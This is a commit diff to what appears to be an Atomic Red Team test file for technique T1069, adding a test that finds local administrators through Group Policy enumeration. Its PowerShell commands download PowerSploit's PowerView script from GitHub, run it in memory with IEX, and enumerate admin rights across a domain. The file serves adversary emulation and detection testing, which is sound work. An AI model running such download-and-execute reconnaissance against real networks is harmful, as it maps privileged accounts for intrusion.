T1069 find local admins via group policy power view (#1006)

* T1069 Find Local Admins via Group Policy (PowerView) * fix default param Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2020-05-21 17:04:33 -05:00
parent 7c87abef47
commit e0eaff95ea
1 changed files with 19 additions and 1 deletions
@@ -80,7 +80,6 @@ atomic_tests:
  auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
  description: |
    Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
-
  supported_platforms:
    - windows
    
@@ -103,3 +102,22 @@ atomic_tests:
    elevation_required: false
    command: |
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin  -Verbose
+
+- name: Find Local Admins via Group Policy (PowerView)
+  description: |
+    takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
+  
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    computer_name:
+      description: hostname of the computer to analyze
+      type: Path
+      default: $env:COMPUTERNAME
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose